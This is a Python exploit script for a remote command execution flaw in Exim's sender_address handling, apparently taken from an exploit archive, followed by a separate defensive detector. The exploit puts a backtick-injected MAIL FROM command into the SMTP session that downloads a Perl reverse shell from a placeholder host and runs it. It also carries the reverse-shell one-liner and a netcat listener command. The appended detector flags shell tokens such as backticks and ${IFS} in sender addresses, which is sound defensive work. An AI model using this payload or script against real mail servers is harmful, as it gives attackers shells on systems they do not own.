Exim sender_address Parameter - RCE Exploit
#!/usr/bin/env python

##################################################################################
## Exim sender_address Parameter - Remote Command Execution Exploit
##################################################################################
##
## Vulnerability found by RedTeam Pentesting GmbH
## https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/
##
## Exploit written by eKKiM
## http://rdtx.eu/exim-with-dovecot-lda-rce-exploit/
##
##################################################################################
## USAGE
##################################################################################
##
## Edit the PERL REVERSE SHELL MY_CONNECTBACK_IP and MY_CONNECTBACK_PORT and
## upload this perl reverse shell script to a webserver.
##
## Edit the PERL_SHELL variable to your own connectback script URL
##
## Start a listener: nc -vvn -l -p CONNECT_BACK_PORT
##
## Let the exploitin begin
##
##################################################################################

####### PERL REVERSE SHELL #######
## use Socket;$i="MY_CONNECTBACK_IP";$p=MY_CONNECTBACK_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
####### PERL REVERSE SHELL #######

import socket
import sys

####### URL TO YOUR CONNECTBACK SHELL #######
PERL_SHELL = "myhost.com/shell.pl"
####### URL TO YOUR CONNECTBACK SHELL #######

if len(sys.argv) != 2:
    print "Usage: exim_exploit.py <target_ip> <optional_rcpt_address>"
    print " <target_ip> target you want to test"
    print " <optional_rcpt_address> an address which is accepted by exim (default: postmaster@localhost)"
    exit(1)

RCPT_TO = "postmaster@localhost"
HOST = sys.argv[1]
PORT = 25

def read_line(s):
    ret = ''

    while True:
        c = s.recv(1)

        if c == '\n' or c == '':
            break
        else:
            ret += c

    return ret

if len(sys.argv) == 3:
    RCPT_TO = sys.argv[2]

print "Exim sender_address Parameter - Remote Command Execution Exploit"
print "Bug discovered by RedTeam Pentesting GmbH"
print "Exploit created by eKKiM"
print ""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

data = read_line(s);
if not(data.startswith("220")):
    print "[ERROR] Is it SMTP Server?"
    exit(1)

s.send("EHLO domain.local\n")
s.recv(4096)

s.send("MAIL FROM: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}" + PERL_SHELL + "``perl${IFS}/tmp/p.pl`@blaat.com\n")
data = read_line(s);
if not(data.startswith("250")):
    print "[ERROR] MAIL FROM not accepted"
    exit(1)

s.send("RCPT TO: " + RCPT_TO + "\n")
data = read_line(s);
if not(data.startswith("250")):
    print "[ERROR] RCPT_TO not accepted"
    exit(1)

s.send("DATA\n")
data = read_line(s);
if not(data.startswith("354")):
    print "[ERROR] Cannot send email content"
    exit(1)

s.send("x\n.\n")
data = read_line(s);
if not(data.startswith("250")):
    print "[ERROR] email content revoked"
    exit(1)

print "[OK] Recieved shell?"
s.close()

# 0day.today [2024-11-15] #
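For defenders, the MAIL FROM value in the script above can be spotted by looking for shell command-substitution tokens in the envelope sender. The following is an added example, not part of the original exploit or the advisory; the token list, the function names, the assumed Exim mainlog layout and the sample lines are constructed assumptions.

```python
import re

# Shell command-substitution and chaining tokens. Several of these characters are
# legal in an RFC 5321 local part, so a hit is an alert to review, not proof.
SHELL_TOKENS = re.compile(r"`|\$\(|\$\{|;|\|")

# SMTP command as seen on the wire: "MAIL FROM:<addr>" or "MAIL FROM: addr".
SMTP_MAIL_FROM = re.compile(r"^MAIL FROM:\s*<?(?P<addr>[^>\r\n]*)>?", re.IGNORECASE)

# Assumed Exim mainlog arrival line: "<date> <time> <msgid> <= <sender> H=... [ip] ..."
EXIM_ARRIVAL = re.compile(r"^\S+ \S+ (?P<id>\S+) <= (?P<addr>\S+)")


def extract_sender(line):
    """Return the envelope sender from an SMTP command or Exim log line, else None."""
    for pattern in (SMTP_MAIL_FROM, EXIM_ARRIVAL):
        m = pattern.match(line)
        if m:
            return m.group("addr").strip()
    return None


def suspicious_senders(lines):
    """Return (line_number, sender, tokens) for senders carrying shell tokens."""
    hits = []
    for n, line in enumerate(lines, 1):
        sender = extract_sender(line)
        if sender is None:
            continue
        tokens = sorted(set(SHELL_TOKENS.findall(sender)))
        if tokens:
            hits.append((n, sender, tokens))
    return hits


# Constructed sample input (not captured traffic); example.* names are placeholders.
SAMPLE = [
    "EHLO domain.local",
    "MAIL FROM: <alice@example.com>",
    "MAIL FROM: x`id${IFS}-u`@example.net",
    "2013-05-03 10:15:01 1UYabc-0001Xy-AB <= bob@example.org H=(mx) [192.0.2.7] P=esmtp S=512",
    "2013-05-03 10:15:09 1UYabd-0001Xz-CD <= x`id${IFS}-u`@example.net H=(domain.local) [192.0.2.9] P=esmtp S=301",
]

if __name__ == "__main__":
    for n, sender, tokens in suspicious_senders(SAMPLE):
        print(f"line {n}: suspicious sender {sender!r} tokens={tokens}")
```

The `${IFS}` token is worth alerting on by itself: it stands in for whitespace, which is why the whole sender still parses as a single space-free field in the log line.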